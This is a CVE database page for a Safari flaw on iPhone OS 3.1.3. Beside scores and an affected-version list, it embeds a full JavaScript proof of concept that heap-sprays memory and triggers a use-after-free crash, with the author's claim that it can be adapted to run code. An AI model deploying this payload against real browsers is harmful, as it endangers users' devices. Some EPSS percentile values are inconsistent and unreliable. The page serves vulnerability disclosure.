CVE-2010-1176

CVE Descriptions

Safari on Apple iPhone OS 3.1.3 for iPod touch allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors related to an array of long strings, an array of IMG elements with crafted strings in their SRC attributes, a TBODY element with no associated TABLE element, and certain calls to the delete operator and the cloneNode, clearAttributes, and CollectGarbage methods, possibly a related issue to CVE-2009-0075.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-94	Improper Control of Generation of Code ('Code Injection') The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9.3		AV:N/AC:M/Au:N/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	5.75%	–	–
2022-02-27	–	–	5.75%	–	–
2022-04-03	–	–	5.75%	–	–
2022-05-22	–	–	5.75%	–	–
2023-03-12	–	–	–	1.77%	–
2023-09-10	–	–	–	1.77%	–
2024-02-11	–	–	–	1.77%	–
2024-06-02	–	–	–	1.77%	–
2024-07-07	–	–	–	1.98%	–
2024-12-22	–	–	–	1.98%	–
2025-01-19	–	–	–	1.98%	–
2025-01-19	–	–	–	1.98%	–
2025-03-18	–	–	–	–	5.55%
2025-03-30	–	–	–	–	5.55%
2025-04-15	–	–	–	–	5.55%
2025-04-22	–	–	–	–	4.58%
2025-04-22	–	–	–	–	4.58,%

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Date	Percentile
2022-02-06	77%
2022-02-27	78%
2022-04-03	89%
2022-05-22	9%
2023-03-12	86%
2023-09-10	87%
2024-02-11	88%
2024-06-02	88%
2024-07-07	89%
2024-12-22	88%
2025-01-19	89%
2025-01-19	89%
2025-03-18	9%
2025-03-30	89%
2025-04-15	9%
2025-04-22	89%
2025-04-22	89%

Exploit information

Exploit Database EDB-ID : 11891

Publication date : 2010-03-25 23h00 +00:00
Author : Nishant Das Patnaik
EDB Verified : Yes

# Exploit Title: Remote DoS on Safari for iPhone & iPod Touch # Date: 26/03/2010 # Author: Nishant Das Patnaik # For more of Nishant's research, please visit: # http://nishantdaspatnaik.yolasite.com/research.php # Tested on: iPod Touch 3G (iPhone OS 3.1.3) # Description: An attacker may direct the user to visit a specially crafted webpage that can lead the Safari browser on iPhone & iPod Touch running iPhone OS 3.1.3 to freeze and finally crash. The attacker can modify to the PoC to run arbitrary code on the device. # Code: ---------PoC STARTS HERE---------------- <html> <title> Remote DoS on Safari for iPhone & iPod Touch </title> <body> <script language="JavaScript"> var size="%u03e8"; var matrix = new Array(); var slope = 0x100000-(size.length*2+0x01020); var bomb = unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); while(bomb.length<slope/2) { bomb+=bomb;} var lh = bomb.substring(0,slope/2); delete bomb; for(i=0; i<0xC0; i++) { matrix[i] = lh + size; } CollectGarbage(); var slope1=unescape("%u0b0b%u0b0b%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000AAAAAAAAAAAAAAAAAAAAAAAAA"); var matrix1 = new Array(); for(var x=0;x<1000;x++) matrix1.push(document.createElement("img")); function ready() { out1=document.createElement("tbody"); out1.click; var out2 = out1.cloneNode(); out11.clearAttributes(); out1=null; CollectGarbage(); for(var x=0;x<matrix1.length;x++) matrix1[x].src=slope1; out2.click; } </script> <script>window.setTimeout("ready();",800);</script> <center> <h1> Remote DoS on Safari for iPhone & iPod Touch </h1> <h2> (C) Nishant Das Patnaik </h2> </center> </body> </html> ---------POC ENDS HERE----------------

Products Mentioned

Configuraton 0

Apple>>Safari >> Version *

Apple>>Safari >> Version - (Open CPE detail)
Apple>>Safari >> Version 1.0 (Open CPE detail)
Apple>>Safari >> Version 1.0 (Open CPE detail)
Apple>>Safari >> Version 1.0 (Open CPE detail)
Apple>>Safari >> Version 1.0.0 (Open CPE detail)
Apple>>Safari >> Version 1.0.0b1 (Open CPE detail)
Apple>>Safari >> Version 1.0.0b2 (Open CPE detail)
Apple>>Safari >> Version 1.0.1 (Open CPE detail)
Apple>>Safari >> Version 1.0.2 (Open CPE detail)
Apple>>Safari >> Version 1.0.3 (Open CPE detail)
Apple>>Safari >> Version 1.0.3 (Open CPE detail)
Apple>>Safari >> Version 1.0.3 (Open CPE detail)
Apple>>Safari >> Version 1.0b1 (Open CPE detail)
Apple>>Safari >> Version 1.1 (Open CPE detail)
Apple>>Safari >> Version 1.1.0 (Open CPE detail)
Apple>>Safari >> Version 1.1.1 (Open CPE detail)
Apple>>Safari >> Version 1.2 (Open CPE detail)
Apple>>Safari >> Version 1.2.0 (Open CPE detail)
Apple>>Safari >> Version 1.2.1 (Open CPE detail)
Apple>>Safari >> Version 1.2.2 (Open CPE detail)
Apple>>Safari >> Version 1.2.3 (Open CPE detail)
Apple>>Safari >> Version 1.2.4 (Open CPE detail)
Apple>>Safari >> Version 1.2.5 (Open CPE detail)
Apple>>Safari >> Version 1.3 (Open CPE detail)
Apple>>Safari >> Version 1.3.0 (Open CPE detail)
Apple>>Safari >> Version 1.3.1 (Open CPE detail)
Apple>>Safari >> Version 1.3.2 (Open CPE detail)
Apple>>Safari >> Version 1.3.2 (Open CPE detail)
Apple>>Safari >> Version 1.3.2 (Open CPE detail)
Apple>>Safari >> Version 2 (Open CPE detail)
Apple>>Safari >> Version 2.0 (Open CPE detail)
Apple>>Safari >> Version 2.0.0 (Open CPE detail)
Apple>>Safari >> Version 2.0.1 (Open CPE detail)
Apple>>Safari >> Version 2.0.2 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.3 (Open CPE detail)
Apple>>Safari >> Version 2.0.4 (Open CPE detail)
Apple>>Safari >> Version 2.0.4 (Open CPE detail)
Apple>>Safari >> Version 3 (Open CPE detail)
Apple>>Safari >> Version 3.0 (Open CPE detail)
Apple>>Safari >> Version 3.0.0 (Open CPE detail)
Apple>>Safari >> Version 3.0.0 (Open CPE detail)
Apple>>Safari >> Version 3.0.0b (Open CPE detail)
Apple>>Safari >> Version 3.0.0b (Open CPE detail)
Apple>>Safari >> Version 3.0.1 (Open CPE detail)
Apple>>Safari >> Version 3.0.1 (Open CPE detail)
Apple>>Safari >> Version 3.0.1 (Open CPE detail)
Apple>>Safari >> Version 3.0.1b (Open CPE detail)
Apple>>Safari >> Version 3.0.1b (Open CPE detail)
Apple>>Safari >> Version 3.0.2 (Open CPE detail)
Apple>>Safari >> Version 3.0.2 (Open CPE detail)
Apple>>Safari >> Version 3.0.2b (Open CPE detail)
Apple>>Safari >> Version 3.0.2b (Open CPE detail)
Apple>>Safari >> Version 3.0.3 (Open CPE detail)
Apple>>Safari >> Version 3.0.3 (Open CPE detail)
Apple>>Safari >> Version 3.0.3b (Open CPE detail)
Apple>>Safari >> Version 3.0.3b (Open CPE detail)
Apple>>Safari >> Version 3.0.4 (Open CPE detail)
Apple>>Safari >> Version 3.0.4 (Open CPE detail)
Apple>>Safari >> Version 3.0.4b (Open CPE detail)
Apple>>Safari >> Version 3.0.4b (Open CPE detail)
Apple>>Safari >> Version 3.0.5 (Open CPE detail)
Apple>>Safari >> Version 3.1.0 (Open CPE detail)
Apple>>Safari >> Version 3.1.0 (Open CPE detail)
Apple>>Safari >> Version 3.1.0b (Open CPE detail)
Apple>>Safari >> Version 3.1.0b (Open CPE detail)
Apple>>Safari >> Version 3.1.1 (Open CPE detail)
Apple>>Safari >> Version 3.1.1b (Open CPE detail)
Apple>>Safari >> Version 3.1.2 (Open CPE detail)
Apple>>Safari >> Version 3.1.2b (Open CPE detail)
Apple>>Safari >> Version 3.2.0 (Open CPE detail)
Apple>>Safari >> Version 3.2.0b (Open CPE detail)
Apple>>Safari >> Version 3.2.1 (Open CPE detail)
Apple>>Safari >> Version 3.2.1b (Open CPE detail)
Apple>>Safari >> Version 3.2.2 (Open CPE detail)
Apple>>Safari >> Version 3.2.2b (Open CPE detail)
Apple>>Safari >> Version 4.0 (Open CPE detail)
Apple>>Safari >> Version 4.0 (Open CPE detail)
Apple>>Safari >> Version 4.0.0b (Open CPE detail)
Apple>>Safari >> Version 4.0.1 (Open CPE detail)
Apple>>Safari >> Version 4.0.2 (Open CPE detail)
Apple>>Safari >> Version 4.0.3 (Open CPE detail)
Apple>>Safari >> Version 4.0.4 (Open CPE detail)
Apple>>Safari >> Version 4.0.5 (Open CPE detail)
Apple>>Safari >> Version 4.1 (Open CPE detail)
Apple>>Safari >> Version 4.1.1 (Open CPE detail)
Apple>>Safari >> Version 4.1.2 (Open CPE detail)
Apple>>Safari >> Version 4.1.3 (Open CPE detail)
Apple>>Safari >> Version 5.0 (Open CPE detail)
Apple>>Safari >> Version 5.0.1 (Open CPE detail)
Apple>>Safari >> Version 5.0.2 (Open CPE detail)
Apple>>Safari >> Version 5.0.3 (Open CPE detail)
Apple>>Safari >> Version 5.0.4 (Open CPE detail)
Apple>>Safari >> Version 5.0.5 (Open CPE detail)
Apple>>Safari >> Version 5.0.6 (Open CPE detail)
Apple>>Safari >> Version 5.1 (Open CPE detail)
Apple>>Safari >> Version 5.1.1 (Open CPE detail)
Apple>>Safari >> Version 5.1.2 (Open CPE detail)
Apple>>Safari >> Version 5.1.3 (Open CPE detail)
Apple>>Safari >> Version 5.1.4 (Open CPE detail)
Apple>>Safari >> Version 5.1.5 (Open CPE detail)
Apple>>Safari >> Version 5.1.6 (Open CPE detail)
Apple>>Safari >> Version 5.1.7 (Open CPE detail)
Apple>>Safari >> Version 6.0 (Open CPE detail)
Apple>>Safari >> Version 6.0.1 (Open CPE detail)
Apple>>Safari >> Version 6.0.2 (Open CPE detail)
Apple>>Safari >> Version 6.0.3 (Open CPE detail)
Apple>>Safari >> Version 6.0.4 (Open CPE detail)
Apple>>Safari >> Version 6.0.5 (Open CPE detail)
Apple>>Safari >> Version 6.1 (Open CPE detail)
Apple>>Safari >> Version 6.1.1 (Open CPE detail)
Apple>>Safari >> Version 6.1.2 (Open CPE detail)
Apple>>Safari >> Version 6.1.3 (Open CPE detail)
Apple>>Safari >> Version 6.1.4 (Open CPE detail)
Apple>>Safari >> Version 6.1.5 (Open CPE detail)
Apple>>Safari >> Version 6.2.1 (Open CPE detail)
Apple>>Safari >> Version 6.2.4 (Open CPE detail)
Apple>>Safari >> Version 6.2.5 (Open CPE detail)
Apple>>Safari >> Version 6.2.6 (Open CPE detail)
Apple>>Safari >> Version 6.2.8 (Open CPE detail)
Apple>>Safari >> Version 7.0 (Open CPE detail)
Apple>>Safari >> Version 7.0.1 (Open CPE detail)
Apple>>Safari >> Version 7.0.2 (Open CPE detail)
Apple>>Safari >> Version 7.0.3 (Open CPE detail)
Apple>>Safari >> Version 7.0.4 (Open CPE detail)
Apple>>Safari >> Version 7.0.5 (Open CPE detail)
Apple>>Safari >> Version 7.1 (Open CPE detail)
Apple>>Safari >> Version 7.1.1 (Open CPE detail)
Apple>>Safari >> Version 7.1.4 (Open CPE detail)
Apple>>Safari >> Version 7.1.5 (Open CPE detail)
Apple>>Safari >> Version 7.1.6 (Open CPE detail)
Apple>>Safari >> Version 7.1.8 (Open CPE detail)
Apple>>Safari >> Version 8.0 (Open CPE detail)
Apple>>Safari >> Version 8.0.1 (Open CPE detail)
Apple>>Safari >> Version 8.0.4 (Open CPE detail)
Apple>>Safari >> Version 8.0.5 (Open CPE detail)
Apple>>Safari >> Version 8.0.6 (Open CPE detail)
Apple>>Safari >> Version 8.0.8 (Open CPE detail)
Apple>>Safari >> Version 9.0.1 (Open CPE detail)
Apple>>Safari >> Version 9.0.2 (Open CPE detail)
Apple>>Safari >> Version 9.0.3 (Open CPE detail)
Apple>>Safari >> Version 9.1 (Open CPE detail)
Apple>>Safari >> Version 9.1.1 (Open CPE detail)
Apple>>Safari >> Version 9.1.3 (Open CPE detail)
Apple>>Safari >> Version 10.0.0 (Open CPE detail)
Apple>>Safari >> Version 10.0.1 (Open CPE detail)
Apple>>Safari >> Version 10.0.2 (Open CPE detail)
Apple>>Safari >> Version 10.0.3 (Open CPE detail)
Apple>>Safari >> Version 10.1 (Open CPE detail)
Apple>>Safari >> Version 10.1.1 (Open CPE detail)
Apple>>Safari >> Version 10.1.2 (Open CPE detail)
Apple>>Safari >> Version 11.0 (Open CPE detail)
Apple>>Safari >> Version 11.0.1 (Open CPE detail)
Apple>>Safari >> Version 11.0.2 (Open CPE detail)
Apple>>Safari >> Version 11.0.3 (Open CPE detail)
Apple>>Safari >> Version 11.1 (Open CPE detail)
Apple>>Safari >> Version 11.1.1 (Open CPE detail)
Apple>>Safari >> Version 11.1.2 (Open CPE detail)
Apple>>Safari >> Version 12 (Open CPE detail)
Apple>>Safari >> Version 12.0 (Open CPE detail)
Apple>>Safari >> Version 12.0.1 (Open CPE detail)
Apple>>Safari >> Version 12.0.2 (Open CPE detail)
Apple>>Safari >> Version 12.0.3 (Open CPE detail)
Apple>>Safari >> Version 12.1 (Open CPE detail)
Apple>>Safari >> Version 12.1.1 (Open CPE detail)
Apple>>Safari >> Version 12.1.2 (Open CPE detail)
Apple>>Safari >> Version 13 (Open CPE detail)
Apple>>Safari >> Version 13.0.1 (Open CPE detail)
Apple>>Safari >> Version 13.0.3 (Open CPE detail)
Apple>>Safari >> Version 13.0.4 (Open CPE detail)
Apple>>Safari >> Version 13.0.5 (Open CPE detail)
Apple>>Safari >> Version 13.1 (Open CPE detail)
Apple>>Safari >> Version 13.1.1 (Open CPE detail)
Apple>>Safari >> Version 13.1.2 (Open CPE detail)
Apple>>Safari >> Version 14.0 (Open CPE detail)
Apple>>Safari >> Version 14.0.1 (Open CPE detail)
Apple>>Safari >> Version 14.0.2 (Open CPE detail)
Apple>>Safari >> Version 14.0.3 (Open CPE detail)
Apple>>Safari >> Version 14.1 (Open CPE detail)
Apple>>Safari >> Version 14.1.1 (Open CPE detail)
Apple>>Safari >> Version 14.1.2 (Open CPE detail)
Apple>>Safari >> Version 15.0.0 (Open CPE detail)
Apple>>Safari >> Version 15.3 (Open CPE detail)
Apple>>Safari >> Version 15.4 (Open CPE detail)
Apple>>Safari >> Version 15.6 (Open CPE detail)
Apple>>Safari >> Version 15.6.1 (Open CPE detail)
Apple>>Safari >> Version 16.0 (Open CPE detail)
Apple>>Safari >> Version 16.1 (Open CPE detail)
Apple>>Safari >> Version 16.2 (Open CPE detail)
Apple>>Safari >> Version 16.3 (Open CPE detail)
Apple>>Safari >> Version 16.4 (Open CPE detail)
Apple>>Safari >> Version 16.4.1 (Open CPE detail)
Apple>>Safari >> Version 16.5 (Open CPE detail)
Apple>>Safari >> Version 16.5.1 (Open CPE detail)
Apple>>Safari >> Version 16.5.2 (Open CPE detail)
Apple>>Safari >> Version 16.6 (Open CPE detail)
Apple>>Safari >> Version 16.6.1 (Open CPE detail)
Apple>>Safari >> Version 17.0 (Open CPE detail)
Apple>>Safari >> Version 17.1 (Open CPE detail)
Apple>>Safari >> Version 17.1.2 (Open CPE detail)
Apple>>Safari >> Version 17.2 (Open CPE detail)
Apple>>Safari >> Version 17.3 (Open CPE detail)
Apple>>Safari >> Version 17.4 (Open CPE detail)
Apple>>Safari >> Version 17.4.1 (Open CPE detail)
Apple>>Safari >> Version 17.5 (Open CPE detail)
Apple>>Safari >> Version 17.6 (Open CPE detail)
Apple>>Safari >> Version 18 (Open CPE detail)
Apple>>Safari >> Version 18.0 (Open CPE detail)
Apple>>Safari >> Version 18.1 (Open CPE detail)
Apple>>Safari >> Version 18.1.1 (Open CPE detail)
Apple>>Safari >> Version 18.2 (Open CPE detail)
Apple>>Safari >> Version 18.3 (Open CPE detail)
Apple>>Safari >> Version 18.4 (Open CPE detail)
Apple>>Safari >> Version 22 (Open CPE detail)
Apple>>Safari >> Version 46 (Open CPE detail)

Apple>>Iphone_os >> Version 3.1.3

Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)
Apple>>Iphone_os >> Version 3.1.3 (Open CPE detail)